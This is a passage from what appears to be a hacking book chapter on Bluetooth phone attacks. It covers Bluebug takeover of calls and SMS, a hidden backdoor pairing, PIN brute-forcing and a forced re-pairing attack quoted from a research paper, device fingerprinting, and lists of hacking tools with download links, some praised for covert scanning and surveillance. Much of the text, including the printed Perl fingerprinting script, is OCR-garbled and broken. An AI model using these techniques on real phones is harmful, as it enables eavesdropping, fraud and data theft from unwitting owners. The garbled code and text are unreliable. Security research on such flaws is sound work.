  3. Especially when one is in a crowded public place, one’s level of alertness should only increase. If one sees that the Bluetooth icon on the mobile Phone is active, then it means that an attack could be in progress.
  4. Many mobile phone manufactures have released updates and fixes for vulnerable mobile phone handsets.

 

The Blue Backdoor Attack

In the previous sections, we discussed some of the most common Bluetooth related attacks currently being used by attackers across the world. Another very dangerous attack that exists on many different mobile phones is known as the Blue Backdoor attack. This proof-of-concept Bluetooth related vulnerability exploits the Pairing mechanism that is used to establish a connection between two Bluetooth enabled devices. Nor only does it give the attacker complete access and control over the target device, bur it also allows the attacker to place strategic backdoors for continued access and entry. This vulnerability can be executed by simply observing following steps:

  1. At any Point of a time a mobile phone device user can easily view the list of currently paired devices by simply going to the Bluetooth settings of the phone. Hence, the user is always aware of all devices with which it is paired. In the Blue Backdoor attack, the attacker connects to the target device in such a manner (maybe using a backdoor or some other vulnerability) that its identity does not come up in the Paired devices list even though it is given complete access and privileges.
  2. Such an attack strategy ensures that unless the target user is actually observing the device screen at the exact moment when the attacker connects to it, the user will not suspect that anything out of the ordinary is taking Place.
  3. The attacker now has complete access to all resources and data on the target mobile device. Hence, the attacker can access all sensitive data, send/recives SMS text messages, make voice phone calls and access the Internet, etc., without the victim user’s permission. The attacker can then misuse the privileges to open other backdoors or execute other vulnerabilities.

 

The Bluebug Attack

The Bluebug attack was first discovered by Martin Herfurt and allows attackers to gain complete control over the data, voice and messaging channels of a vulnerable target mobile phone device. In other words, this attack can be used to nuke phone calls, send SMS/MMS messages, read/ add/edit/modify/delete entries in the address book, make use of data services like the Internet, set up call forwards and a lot of other exciting things. According to Adam and Ben Laurie, credited with doing a lot of research on this loophole, the BlueBug attack can be described as:

 

The bluebug attack creates a serial profile connection to the device, thereby giving full access to the AT command set, which can then be exploited using standard off the shelf tools, such as PPP for networking and gnokii for messaging, contact manage7nent, diverts and initiating calls. With this facility, it is possible to use the phone to initiate calls to premium rate numbers, send sms messages, read sms messages, connect to data services such as the Internet, and even monitor conversations in the vicinity of the phone. This latter is done via a voice call over the GSM network, so the listening post can be anywhere in the world. Bluetooth access is only required for a few seconds in order to ser up the call. Call forwarding diverts can be set up, allowing the owner’s incoming calls to be intercepted, either to provide a channel /or calls to more extensive destinations or /or identity theft by impersonation of the victim

 

Fadia’s Hot Picks for Popular Bluebug Hacking Tools

  1. Utility Name: BlueBug

Features: Just what the name says!

Download URL: hrtp://www.trifinite.org

 

Other Attacks

Earlier in this chapter, we learnt that before a Bluetooth connection can be successfully established between any two devices, the pairing process has to be completed where the devices exchange their respective pairing codes and a generated encryption key. These keys not only authenticate the two Bluetooth devices, but also help to make the connection exclusive and binding. Unfortunately, both the pairing codes and the encryption key suffer from a variety of vulnerabilities given as follows:

 

  1. Short Pairing Code

The Bluetooth protocol allows applications and devices to use 16 digit long pairing codes. Unfortunately many applications continue to use only 4 digit long pairing codes. This makes Bluetooth enabled devices that use a short pairing code vulnerable to brute force attacks executed with the help of a Bluetooth enabled computer. Hence, it is Possible for a user to forcibly crack the pairing code of a vulnerable device and execute further malicious activities. Unfortunately, most people have the tendency to select and use short pairing codes.

 

  1. Default Parining code

Most slave Bluetooth devices like wireless headsets (or devices that do not have keyboards) continue to use default short pairing codes like 0000 or 1111 or 1234. Such pairing codes are extremely easy to crack and can easily be exploited by malicious users. However, it is important to more that a slave Bluetooth device can only have one master Bluetooth device. If successfully executed, such an attack can lead to leakage of conversations or even data.

  1. Random challenge Response Generators

Many applications restrict the available space from which they choose input values to generate the random challenge response generators that makes the Bluetooth connection unique and binding. This makes the keys quite vulnerable to brute force attacks. Hence, it is very important for applications to ensure that the input values that are used to generate the challenge responses are random enough.

 

  1. Man-In-Middle Attacks

Bluetooth allows the DESTINATION device to authenticate the identity of the SOURCE device by asking it to compute the challenge response. However, the identity of the DESTINATION is never authenticated by the SOURCE. This makes Bluetooth vulnerable to a number of Man-In- Middle attacks where a malicious attacker can pretend to be an authentic DESTINATION device.

 

  1. Privacy Concerns

A Bluetooth device that is enabled bur not currently in use, brings a lot of privacy concerns to the forefront. An enabled Bluetooth device is constantly scanning to discover other devices in mange or scanning to get discovered by other devices. Unfortunately, this also means that an enabled Bluetooth device is constantly broadcasting its name and IMEI (International Mobile Equipment Identity). This makes the enabled mobile device vulnerable to privacy concerns that can be exploited by malicious users.

 

  1. Brute Force Attacks

A number of people set the mode of their Bluetooth device to Hidden to Prevent malicious users from discovering it. Such a strategy also protects the privacy of the user by hiding the MAC address of the Bluetooth enabled device. However, it is possible to brute force the MAC address of a device even if it is in th hidden mode. For example, the Redfang tool is one of the best of such brute force crackers.

 

  1. DOS Attacks

Bluetooth are radio signals working in the 2.4 GHZ frequency range. This makes it potentially vulnerable against interference or jamming attacking or DOS attacks by a number of other noisy appliance like phones, microwave ovens and others. Bluetooth uses a process called frequency hopping and keeps changing its operating frequency to make it very difficult for an attaker to carry out a jamming attack.

 

  1. Cracking the Pair Codes

We have already seen how important and integral, pair codes are to the Bluetooth communication protocol. Following is an excerpt from a paper titled Cracking the Bluetooth PIN written by Yaniv Shaked and Avishai Wool which explains the process of cracking the PIN of a Bluetooth device in detail.

Overview of Bluetooth Security

            This papers deals with the mechanisms used in Bluetooth Security Mode 3: The Link-level securtiy Mode. In this mode, a Bluetooth device will initiate security measures before a channel is establised. This is an in bulit mechanism that is used regardless of the application layer security that may also be used. In security mode 3 terminology, establishing a channel between two Bluetooth devices is called pairing or bonding.

The Bluetooth pairing and authentication process.

The Bluetooth initialization procedure consists of 3 or 4 steps given as follows.

  1. Creation of an intialization key (Kinit).
  2. Creation of a link key (Kab).

After the 3 pairing steps are completed, the devices can derive an encryption key to hide all future communicated in an optional fourth step.

Before the pairing process can begin, the PIN code must be enterd into both Bluetooth devices. Note that in some devices (like wireless earphones) the PIN is fixed and cannot be changed.In such cases, the fixed PIN is entered into the peer device. If two devices have a fixed PIN, they cannot be paired, and therefore, cannot communicate. In the following sections we go into the details of the steps of the pairing process.

 

Creation of Kinit

The Kinit key is created using the E22 algorithm. whose inputs are the following:

  1. A BD_ADDR.
  2. The PIN code and its length.
  3. A 128 bit random number IN_RAND.

This algorithm outputs a 128 bit word, which is referred to as the initialization key (Kinit).

Figure 1.1 describes how Kinit is generated using E22. Note that the PIN code is available at both Bluetooth devices, and the 128 bit IN_RAND is transmitted in plaintext. As for the BD_ADDR: if one of the devices has a fixed PIN, they use the BD_ADDR of the peer device. If both have a variable PIN, they use the PIN of the slave device that receives the IN_RAND. In Figure 1.1, if both devices have a variable PIN, BD_ADDR, shall be used. The Bluetooth device address can be obtained via an inquiry routine by a device. This is usually done before connection establishment begins.

 

of the link key (kab), the kinit key is discarded.

Creation of Kab

After creating the initialization key, the devices create the link key Kab. The devices use the initialization key to exchange two new 128 bit random words, known as LK_RAND A and LK_RANDB. Each device selects a random 128 bit word and sends it to the other device after bitwise xoring it with Kinit. Since both devices know, each device now holds both random numbers LK_RANDA and LK_RANBB. Using the E21 algorithm, both devices create the link key Kab. The inputs of E21 algorithm are:

  1. A
  2. The 128 bit random number

Note that E21 is used twice in each device, with two sets of inputs. Figure 1.2 describes how the link key Kab is created.

 

Mutual Authentication

Upon creaion of the link key  kab , mutual authentication is performed.This process is based on a challenge-response scheme. One of the device  the verifier, randomizes and sends (in plaintext) a 128 bit word called AU_RAND A. The other device, the claimant, calculates a 32 bit word callded  SRES using an algorithm E1. The claimant sends the 32 bit SRES Word as a  reply to the verifier, who verifies (by performing the same calculations), the response word. If the response word is successful, the verifier and the claimant change roles and repeat the entire process. Figure 1.3 describes the process of mutual authentication. The inputs to E1 are:

  1. The random word AU_RANDA’
  2. The link key Kab.
  3. Its own Bluetooth device address (BD_ADDRB)

 

Note that as a side effect of the authentication process, a 96 bit word called ACO is calculated by both peers. This word is optionally used during the creation of the encryption key. The creation of this encryption key exceeds our primary discussion and shall not be described in this book.

 

 

           The Basic Attack

Table 1.2: List of messages sent during the pairing
and authentication process

 

#       Src       Dst         Data

1         , A                               B             IN_RAND

2             A            B            LK_RANDA

3            B             A           LK_RAND B

4             A            B             AU_RANDA

5             B            A            SRES

6              B            A           AU_RAND

7         A            B            SRES

 

Length

128 bit 128 bit 128 bit 128 bit 32 bit 128 bit 32 bit

Notes

plaintext XORed with

XORed with Kink plaintext

plaintext plaintext Plaintext

`A’ and ‘B’ denote the two Bluetooth devices.

Assume that the attacker eavesdropped on an entire pairing and authentication process and saved all the messages (see Table 1.2). The attacker can now use a brute force algorithm to find the PIN used. The attacker enumerates all possible values of the PIN. Knowing IN_RAND and the BD_ADDR, the attacker runs E22 with those inputs and the guessed PIN, and finds a hypothesis for Kinit. The attacker can now use this hypothesis of the initialization key, to decode messages 2 and 3. Messages 2 and 3 contain enough information to perform the calculation of the link key K ab. giving the attacker a hypothesis of Kab. The attacker now uses the data in the last 4 messages to test the hypothesis. Using Kab, and the transmitted AU_RANDA (message 4), the attacker calculates SRES and compares it to the data of message 5. If necessary, the attacker can use the value of messages 6 and 7 to reverify the hypothesis K ab until the correct PIN is found. Figure 1.4 describes the entire process of PIN cracking.

Note that the attack, as described, is only fully successful against PIN values of fewer than 64 bits. If the PIN is longer, then with high probability there will be multiple PIN candidates, since the two SRES values only provide 64 bits of data to test against. A 64 bit PIN is equivalent to a 19 decimal digits PIN.

 

Implementation

This section describes our implementation of the PIN cracking attack, through several optimization versions. We implemented all the versions in C with some embedded 80 x 86 assembly instructions. We used the Microsoft VC+ + compiler on a PC running Microsoft Windows 98.

The Baseline

Before writing optimized versions of the code, we established two baseline implementations for comparison purposes, as follows.

The `as-is’ version

This version is a non-optimized implementation of the attack, using C code only. The bias vectors which are used during the SAFER+ key scheduling algorithm are calculated offline, and the substitution boxes e and 1 are implemented using two pre-calculated look-up tables.

The Basic Version

This version is identical to the `as-is’ version, but with compiler optimizations to yield maximal speed [Compile option /02].

Improved KSA and Expansion

Our first optimization technique focuses on the SAFER+ Key Scheduling Algorithm (KSA). We identified two effective optimizations in the KSA which are as follows:

  1. Caching the calculation result of the expansion operation in the E21 and E22 algorithms on the BD_ADDR of both peers. Since the input of BD_ADDR to E21 and E22 is nearly static (only two values of BD_ADDR are used during the PIN cracking attack), it is possible to perform the calculation of Expansion (BD_ADDR, 6) only once, and save the result for later use.
  2. Enhancements of the implementation of the key scheduling algorithm. We found that the implementation of the byte-rotate operation using C code is expensive. Instead we used inline assembly code which employed the ROL Furthermore, we found that the modulo 17 operation used to extract specific bytes from a batch of 17 bytes during the key scheduling algorithm is very expensive. Instead, we used a pre-calculated look-up table.

 

PHT as Look-up Table

In this version we used a large look-up table to implement the Pseudo Hadamard Transformation (PHT) operation, which is used 32 time during a single SAFER+ round. The look-up table is 65,536 entries long, since the transformation receives two bytes (28) and replaces them. The routine which implements the use of such a look-up table was written in pure assembly code. The look-up table was pre-calculated offline.

Algebraic Manipulation

Our most interesting and most effective optimization is the algebraic manipulation of the SAFER+ round. A key observation is that almost the entire SAFER+ round (except the look up tables e and 1 and the key addition steps) can be implemented as a 16 x 16 matrix multiplying the vector of 16 input bytes (all operations modulo 256). This is possible since the operations used in the Armenian shuffles and Pseudo Hadamard Transformations are linear. By tracing back through the Shuffles and PHT boxes we computed the 16 x 16 matrix coefficients as follows:

 

Our goal is to implement the multiplication (a 16 coefficients vector by a 16 x 16 matrix) faster than the traditional implementation of the Armenian shuffles and the PHT. A naive implementation of multiplying the vector with each column of the matrix would have taken 16 multiplication operations and 16 add operations for each column; 32 operations for each column, yielding 512 operations for the entire matrix (plus load and store operations). Such an implementation is slower than the traditional one. We found that each PHT box consists of 7 operations and the Armenian shuffle consists of 32 operations. This yields 320 operations for the traditional implementation (32 PHT boxes and 3 Armenian shuffles).

However, a careful examination of the above matrix shows that we can do much better. A much faster implementation is possible because the matrix has a great deal of structure, and because all the coefficients are powers of 2.

Observe that every pair of consecutive columns, starting with the two leftmost columns, is identical in half of their coefficients. All other coefficients in the left column are equal to twice the value of the coefficients in the right column. This structure is very useful, since -the-result of multiplication of half the column can be used in both columns. Furthermore, the product of the other coefficients can be calculated once and used for both columns, since they differ only by a factor of 2.

The fact that the coefficients are all powers of 2 is also helpful, since instead of using multiplication operations, the calculation is done using a shift left operation.

The next pseudo code depicts the calculation procedure for two columns. Note the saving in shift operations, done by arranging the add operation in an appropriate manner. The input vector is denoted by X = (xo, ……., x15), and we show the calculation of the outputs yo and y1 as follows:

h1 = x1 + x2 + x3 + x6 + x7 + 2(xo + x5 +2(x4))

h2 = x8 + x9 + x11 + 2(x10 + x12 + x13 +2(x15 +2(x14)))

 y1= h1 + h2

Yo= Y1+ h2

How fast is the new implementation?

This implementation consists of 5 shift left operations, 16 add operations, 2 load operations and 2 store operations. This yields 25 operations per 2 columns, 200 operations for the entire matrix multiplication, 30 per cent fewer than needed in the normal implementation.

Results

  This subsection presents the cracking time of the five versions. All the versions were run on an old Pentium III 450MHz Personal Computer. For each version we tried several PIN sizes, ranging from 4 to 7 decimal digits.

Figure 1.5 compares the results obtained from all five versions. The Y axis denotes the running time in seconds (logarithmic scale), and the X axis denotes the number of decimal digits the PIN contains.

The final version improves the cracking speed by a factor of 10 and brings the time to crack a 4-digit PIN down to 0.27 sec. To gain some insight on how the attack improves with stronger hardware, we also ran our best attack version on a Pentium IV 3Ghz HT. On this computer we were able to crack a 4-digit PIN in 63 msec (see Table 1.3), 4 times faster than on the Pentium III. This makes the attack near-real-time.

Table 1.3: Summary of results obtained running the last version
on a Pentium IV 3Ghz HT computer

PIN Length (digits)                             Time (seconds

4                                                          0.063

5                                                           0.75

6                                                          7.609

7                                                          76.127

The Re-Pairing Attack

Background and Motivation: This section describes an additional attack on Bluetooth devices that is useful when used in conjunction with the primary attack described earlier. Recall that the primary attack is only applicable if the attacker has eavesdropped on the entire process of pairing and authentication. This is a major limitation since the pairing process is rarely repeated. Once the link key Kab, is created, each Bluetooth device stores it for possible future communication with the peer device. If at a later point in time the device initiates communication with the same peer — the stored link key is used and the pairing process is skipped. Our second attaclk exploits the connection establishment protocol to force the communicating devices to repeat the pairing process. This allows the attacker to record all the messages and crack the PIN using the primary attack described in this book.

Attack Details: Assume that two Bluetooth devices that have already been paired before, now intend to establish communication again. This means that they do not need to create the link key Kab again, since they have already created and stored it before. They proceed directly to the Authentication phase (See Figure 1.3). We describe three different methods that can be used .to force the devices to repeat the pairing process. The efficiency of each method depends on the implementation of the Bluetooth core in the device under attack. These methods appear in order of efficiency:

  1. Since the devices skipped the pairing process and proceeded directly to the Authentication phase, the master device sends the slave an AU_RAND message and expects the SRES message in return. Note that Bluetooth specifications allow a Bluetooth device to forget a link key. In such a case, the slave sends an LMP_not_accepted message in return, to let the master know it has forgotten the link key. Therefore, after the master device has sent the AU_RAND message to the slave, the attacker injects an LMP_not_accepted message towards the master. The master will be convinced that the slave has lost the link key and pairing will be restarted. Restarting the pairing procedure causes the master to discard the link key. This assures pairing must be done before devices can authenticate again.
  2. At the beginning of the Authentication phase, the master device is supposed to send the AU_RAND to the slave. If before doing so, the attacker injects a IN_RAND message toward the slave, the slave device will be convinced that the master has lost the link key and pairing is restarted. This will cause the connection establishment to restart.
  3. During the Authentication phase, the master device sends the slave an AU_RAND message and expects a SRES message in return. If, after the master has sent the AU _RAND message, an attacker injects a random SRES message toward the master, this will cause the Authentication phase to restart, and repeated attempts will be made. At some point, after a certain number of failed authentication attempts, the master device is expected to declare that the authentication procedure has failed (implementation dependent) and initiate pairing.

 The three methods described above cause one of the devices to discard link key. This assures that the pairing process will occur during the connection establishment, so the attacker will be able to eavesdrop on the entire process and use the method described earlier to crack the PIN.

In order to make the attack ‘online’, the attacker can save all the messages transferred between the devices after the pairing is complete. After breaking the PIN (0.06-0.3 sec for a 4 digit PIN), the attacker can decode the saved messages, and continue to eavesdrop and decode the communication on the run. Since Bluetooth supports a bit rate of 1 Megabit per second, a 40KB buffer is more than enough for the common case of a 4 digit PIN.

 

Note:

  1. The Bluetooth specification does allow devices to forget link keys and to require repeating the pairing process. This fact makes the re-pairing attack applicable.
  2. Re-pairing is an active attack that requires the attacker to inject a specific message at a precise point in the protocol. This in most cases requires a custom Bluetooth device, since off-the-shelf components will be unable to support such behaviour.
  3. If the slave device verifies that the message it receives is from the correct BD ADDR, then the attack requires the injected message to have its source BD ADDR ‘spoofed’ — again requiring custom
  4. If the attack is successful, the Bluetooth user will need to enter the PIN again — so a suspicious user may realize that his Bluetooth device is under attack and refuse to enter the PIN.

Countermeasures

This section details the countermeasures one should consider when using a

Bluetooth device. These countermeasures will reduce the probability of being  subjected to both attacks and the vulnerability-to these attacks.

 Since Bluetooth is a wireless technology , it is very difficult to avoid Bluetooth Signal from m leaking outside the desired boundaries. Therefore, one should follow the recommendation in the Bluetooth standard and refrain frorn entering the PIN into the Bluetooth device for pairing as much as possible. This reduces  the risk of an attacker eavesdropping on the pairing process and finding the PIN used.

Most Bluetooth devices save the link key (Kab) in non-volatile memory for future use. This way, when the same Bluetooth devices wish to communicate again, they use the stored link key. However, there is another mode of work, which requires entering the PIN into both devices every time they wish to communicate, even if they have already been paired before. This mode gives a false sense of security! Starting the pairing process every time increases the probability of an attacker eavesdropping on the messages transferred. We suggest not to use this mode of work.

Finally, the PIN length ranges from 8 to 128 bits. Most manufacturers use a 4 digit PIN and supply it with the device. Obviously, customers should demand the ability to use longer PINs.

  • Unit Key Attacks

 Several Bluetooth enabled devices use one unit key for connections with all other devices. This means that the same unit key has to be shared and sent to all devices with which it communicates. Hence, all trusted devices that communicate with such Bluetooth devices will have access to its unit key. It is possible for a trusted device to impersonate the identity of a vulnerable device and eavesdrop on all data transfer. Although unit keys are not recommended by the latest Bluetooth implementation, they still exist to provide backward compatibility.

 

 

(j) Impersonation Attacks

A variety of different impersonation attacks are possibly related to Bluetooth, wherein the attacker pretends to be a trusted mobile device and establishes a connection with the target mobile device.

 

Blueprinting

Information gathering is every computer criminal’s first step in the quest to break into a target system. It is very important for all computer criminals to spend some time on finding information on the target computer. This can be done either through numerous information gathering techniques like fingerprinting and so on. Even Bluetooth devices can be fingerprinted or probed for information using a technique known as Blueprinting. In other words, Blueprinting is the technique of sending data to/ Bluetooth enabled device and recording the responses received. These recorded responses can then be utilized to determine various information about the Bluetooth enabled device including the manufacturer, device model and version. A vey good analogy to understand Blueprinting is that of Internet Protocol (IP) fingerprinting..Every sing e computer on the Internet has characteristics Unique to it like its IP Address, operating system and other services be found running on it. This unique information about a remote computer can easily be found with it the help of IP fingerprinting tools (like nmap). Similarly, what IP fingerprinting is to a remote computer, Blueprinting is to remote Bluetooth enabled devices. Every Bluetooth enabled device too has unique characteristics (like manufacturer, model and software information) that can be found out using Blueprinting.

It is important to understand that every single Bluetooth enabled device  single n the has unique characteristics associated with it. For example, every Bluetooth device has a unique 48-bits long Bluetooth device address of the form MM:MM:MM:XX:XX:XX where the M’s part represents manufacturer and the X’s part represents different things in different For example, an address whose M’s part is 00:60:57 always represent a Nokia mobile phone. Such unique information about a remote Bluetooth device can easily be found out with the help of Blueprinting by observing the following main steps:

Step 1: ATTACKER   ——–        Sends Probe ——à  BLUETOOTH DEVICE

Step 2: BLUETOOTH DEVICE ——- Sends back Hash —–à ATTACKER

Step 3: The received hash is studied and compared to the known hashes chart given in Table 1.4 to identify unique characteristics of the remote Bluetooth device.

 

 

 

 

 

:

Table 1.4: Hashes Chart

 

Blueprinting Hash Manufacturer Model Firmware
00:0A:95@1114112 Apple Wireless Keyboard Unknown
00:01:EC@2359452 Ericsson T39M Unknown
00:30:6E@269099048 HP Bt130 Unknown
08:00:28@3342638 HP iPAQ h6315 Initial Firmware
08:00:17@2949325 HP iPAQ 5500 PocketPC
(4.20.1081)
00:0C:55@983040 Microsoft Windows XP SP2
C6:F7:4A@655407 Motorola A1000 Unknown
00:0A:28@1769675 Motorola V600 Unknown
00:60:57@1704044 Nokia 3650 Unknown
00:60:57@1704020 Nokia 3650 Unknown
00:60:57@1704022
00:60:57@1704023
Nokia
Nokia
3650
3650
Unknown
Unknown
Scanned by 

00:60:57@3605290

Nokia 6310i Unknown
00:60:57@3607710 Nokia 6310i Unknown
00:60:57@3604685 Nokia 6310/6310i Unknown
00: 60: 57@2621543 Nokia 6310/6310i Unknown
00:0E:ED@4391166 Nokia 6320 Unknown
00:60:57@1704035 Nokia 6600 Unknown
00:60: 57@1704034 Nokia 6600 Unknown
00:02:EE@4391166 Nokia 6820 Unknown
00:60:57@4128974 Nokia 7600 Unknown
00:60:57@1507391 Nokia 7650 Unknown
00:02:EE@ 1507908 Nokia 7650 V 3.16/15-08-02/
NHL-2NA
00:02:EE@5112150 Nokia 7820 Unknown
00:60:57@ 1704022 Nokia N-Gage Unknown
00: 60: 57@1704023 Nokia N-Gage Unknown
00:60:57@1507402 Nokia N-Gage V 3.30 28-08-2003
NEM-4
08:00:46@196613 Sony Sony Clie PEG Unknown
TH55
00:0A:D9@4063698 Sony Ericsson T610 R1L013
00:0E:07@4063698 Sony Ericsson T630 Unknown
00:0A:D9@917518 Sony Ericsson P800 CXC12529 R2C6
00:0A:D9@1179718 Sony Ericsson P900 Unknown
00:0A:D9@1180018 Sony Ericsson P900 Unknown
00:0A:D9@1179678 Sony Ericsson P900 Unknown
00:0A:D9@4063698 Sony Ericsson Z600 Unknown
00:01:E3@1188286 Siemens S55 Unknown
00:01:E3@1537756 Siemens S55 PDate: 2003-03-31
SWVersion: 12 SW-
Date: 2003-03-28
Variant: A 159 Std-
MAp/SW: 76/14
00:01:E3@1957354 Siemens S65 Unknown
01:90:71 @ 1957354 Siemens SK65 Unknown
00:01:E3@1704023 Siemens SX1 Product: SX1 P-
Date: 2003-12-14
SVN: 05 Appl SW
Date: 21112003 Appl
SW: 12:2 05 Date:
2003-11-21 Modem
Variant:B 101 Std-
Map/SW: 1/5 D-Map/
Prov: 1/6 Variant
Name: SX1 TMOD-
uk-den105 0003
Blueprinting Hash Manufacturer Model Firmware
 

 

 

 

 

 

 

 

 

00:E0:00@983040

 

 

 

 

 

 

 

 

 

Siemens Fujitsu

 

 

 

 

 

 

 

 

 

LOOX 600

 

Lang T9: uk-de-nl/ uk-de-nl Rolf Variant Name: SX1 TMOD-

uk-denl 05 0003

Rolf lang T9: uk-de-ni/ uk-de-nl Codecs: FR/ EFR/HR Audio-Patr.: NfV 16 Acc.: None

 

 

Operating System Version: 3.0 (Pocket  PC but version is unknown)

 

 

Courtesy: Martin Herfurt and Colin Mulliner

Typically, Blueprinting is a technique commonly employed to gather statistics about manufacturers and vendors. However, it can also be used by an attacker to scan a particular area for the presence of vulnerable mobile phones.

 

Fad ia’S Hot Picks for Popular Blueprinting Tools

The easiest method to carry out Blueprinting is to use any of the following tools that are available on the Internet:

  1. Utility Name: Blueprint

Features: Just what the name says!

Download URL: http://wwwtrifinite.org

 Source Code:

 

  • #!/usrlbin/perl

#

#BluePrint v0.1

  • Collin Mulliner and Martin Herfurt
  • (c) {collin,martin}@org

use Switch;

  • — config —

# Database

$BP_DB:=”blueprint.db”;

# — info —

if ($#ARGV < 0) {

print “InBluePrint v0.1 – by the trifinite group\n” . “http:llwww.trifinite.org\n\n” .

“usage:In” .

“Itsdptool browse —tree XX:XX:XX:XX:XX:XX \  .1bp.pl XX:XX:XX:XX:XX:XX <option>\n\n” .

“option can be one of -mkdb (no database lookup just generate hash)\n” .

-nomac (don’t use the MAC/BD ADDR for database

lookups)In”;

exit(0);

}

# — parameters —

# BD_ADDR

$BD_ADDR=$ARGV[0];

$BDADDR =— s/;…..:….: $//;

$mkdb = 0;

if ($ARGV [1] eq “-mkdb”) $mkdb = 1;

}

$nomac = 0;

if ($ARGV[1] eq “-nomac”) $nomac = 1;

}

# — calc hash —

$state = 0;

$fp = 0;

$tmpfp = 0;

while ($line = <STDIN>) {

#print $line;

chomp ($line);

$ = $line;

switch ($state) {

case 0

if (/Service RecHandlel) {

$state = 2;

$_ = s/ ^ Service RecHandle: II;

$tmp_fr = hex $_.;

}

elsif (IServiceRecordHandlel) { $state = 1;

}

}

case 1 {

if (/Integer/) $state = 2;

$=—

$tmp _ft) = hex $_;

}

}

case 2 {

if (/Channel: /) {

$state = 0;

$_ =— s/Channel: II;

51^ [1sIt] +II; $_=— sl[Islt]+$11;

$h’ = $.fi) ($tmpfp $.j;

}

elsif (1Channel/Port/)

{

$state = 0;

$+=s/.*II;

$fp, = $fp + ($tmp_fp* (hex $_));

}

}

# — combine FP and BD ADDR if ($nomac == 0) {

$h3 = $13D ADDR . “@” • $fp;

}

 

#print VIn”;

# — in mkdfb mode just print key and exit if ($mkdb == 1) {

print “$fi3\n”; exit;

}

# — search database —

$p = 0;

$c = 0;

open (DB, “< $BP_DB”) or die “can’t open $BP DB”;

while ($line = <DB>){

chomp (Vine);

$_ = $line;

($p == 0) {

if (/ ^ $.fi,$/ && $nomac == 0) {

$p = I;

$c = 1;

print “$line\n”;

}

if (/ ^ .*1@$fp$/ && $nomac == 1) {

$p = 1;

$c = 1;

 print “$line\n”;

}

}

elsif ($p == 1) {

if (/ ^E0D/){

print “\n”;

#close (DB);

#exit(0);

# find more then one match

 $p = 0;

}

else {

print “$line\n”;

}

}

}

close(DB);

# — no match found —

if ($c == 0) {

print “Inno match found for: $fp,\n\n” .

“Please report the fingerprint and the complete SDP data plus as much\n” .

 

“information about the device and the software running on it especially\n” .                      ,

 “the software version is of interest.InIn” .

    “Send everything to: blueprint1@trifinite.org, thank you!\n\n”;

}

 

  1. Utility Name: Redfang

Features: It is a brute force tool that finds even non-discoverable Bluetooth devices by performing a randomized attack on the last six bytes of the respective addresses of the device. Very good tool for information gathering purposes! This tool can also be used for OBEX related attacks.

Download URL: http://www.atstake.com

  1. Utility Name: btscanner

Features: It is an information gathering tool that allows attackers to query devices without the need to carry out pairing.

Download URL: http://www.pentest.co.uk

 

Bluetooth Wardring

Bluetooth Wardriving is fast becoming one of the most common hobbies for a number of teenagers across the world. This hobby entails nothing but walking about crowded places and scanning for Bluetooth devices. This can easily be done with the help of a Bluetooth device and scanning tools available on the Internet. It allows users to map Bluetooth devices to physical locations. Bluetooth Wardriving has become popular for both its voyeuristic and malicious purposes. Typically, three main approaches are used to carry out Bluetooth Wardriving:

Active Search

In this type of a scan, the Bluetooth device actively sends out query messages to all Bluetooth devices-in a given area with an attempt to discover them. The responses thus received from all the Bluetooth devices that are then logged for future reference. This logged file can then be searched for a particular device’s MAC address. It is important to note that such a search method is effective only in discovering those mobile devices that are in discoverable mode.

 

Passive Search

This search method is a more passive one where the attacker passively monitors all communication between all mobile phone devices in a particular region. A specific mobile phone device is identified by looking out for the CAC code (Channel access code) which is computed from the address of the Bluetooth device. Such a search method is effective even if the target mobile device is in the hidden mode.

 

Paging Search

This search method allows an attacker to identify whether a Bluetooth device with a particular MAC address is present in a region or not. In this technique, the attacker sends a connection request to the target device. If a reply is generated, then it means that the target device is present in range. However, on the other hand, if no reply is received, then a time out will take place.

Fadia’s Hot Picks For Popular Bluetooth Hacking Tools

We have already discussed a variety of different Bluetooth related attacks, loopholes and vulnerabilities. Some of the most common and popular Bluetooth Hacking related tools are as follows:

  1. Utility Name: BlueAlert

Features: A Windows based tool that runs on a Bluetooth enabled computer and alerts the user each time a Bluetooth device leaves or enters into range.

Download URL: http://www.tdksystems.com

  1. Utility Name: BlueFang Features: Similar to the BlueAlert tool.

Download URL: http://www.atstake.com

  1. Utility Name: BlueSniff

Features: A GUI tools that helps attackers to search for both discoverable and hidden Bluetooth devices in range. Excellent tool for Bluetooth wardriving!

Download URL: http://bluesniff.shmoo.com/

  1. Utility Name: BlueSpam

Features: This tool runs on PalmOS and searches for all Bluetooth devices in range and sends them an arbitrary file.

Download URL: http://www.mulliner.org/

  1. Utility Name: btChat

 

Features: A Bluetooth based Instant Messaging tool that allows Bluetooth enabled devices to chat with one another for free.        

Download URL: http://www.mulliner.org/

  1. Utility Name: Bluestumbler

Features: Bluestumbler is a proof of concept tool developed by  the owners of A.L. Digital Ltd. This tool allows attackers to monitor and log all visible Bluetooth device and find out the manufacturer information using blueprinting techniques.

Download URL: Not available to public yet.

  1. Utility Name: BlueBrowse

Features: BluesBrowse is another proof of concept tool developed by the owners of A.L. Digital Ltd. This tool allows attackers to find out all available services on a particular Bluetooth enabled device.

Download URL: Not available to public yet.

  1. Utility Name: Bluefish

Features: Bluefish is a surveillance system that scans for Bluetooth enabled devices and keeps track of tkleir movements. It also has the capability to take a photograph of the location each time a Bluetooth device is found. Typically, used for profiling and information gathering purposes.

Download URL: http://www.nobodaddy.org

Hacking Truth: A Bluepot device is nothing but a trap or a bait device that has been set up with the sole aim of luring attackers into attacking. While the attacker is busy attacking the bait mobile device, in the background, valuable information is being collected about the patterns and trends of the attackers. Such Bluepot mobile devices are extremely useful in gathering more knowledge and understanding of how attackers function and what kind of tools they use. A bluepot is to mobile phones what a honeypot is to computers. Typically a bluepot device comprises of a J2ME mobile phone that imitates a vulnerable phone and secretly records all malicious traffic and activity.

 

 

Vulnerable Mobile Phone Handsets

 

We have already discussed some of the most common and dangerous Bluetooth related attacks being used by attackers. The Table 1.5 depicts the known vulnerabilities in various mobile phone handsets at the time of print:

Table 1.5: Mobile Phone Vulnerabilities

 

Mobile Phone Handset BlueJacking BlueSnarf
Attack
BlueBug
Attack
Nokia 6310 Yes Yes No
Nokia 6310i Yes Yes Yes
Nokia 7650 Yes No Yes
Nokia 8910 Yes Yes Yes
Nokia 8910i Yes Yes Yes
Sony Ericsson R520m Yes Yes Yes
Sony Ericsson T39m Yes
Sony Ericsson T68i Yes Yes Yes
Sony Ericsson T610 Yes Yes Yes
Sony Ericsson Z1010 Yes Yes
Sony Ericsson Z600 Yes Yes Yes

 

 

Countermeasures To Bluetooth Hacking

 

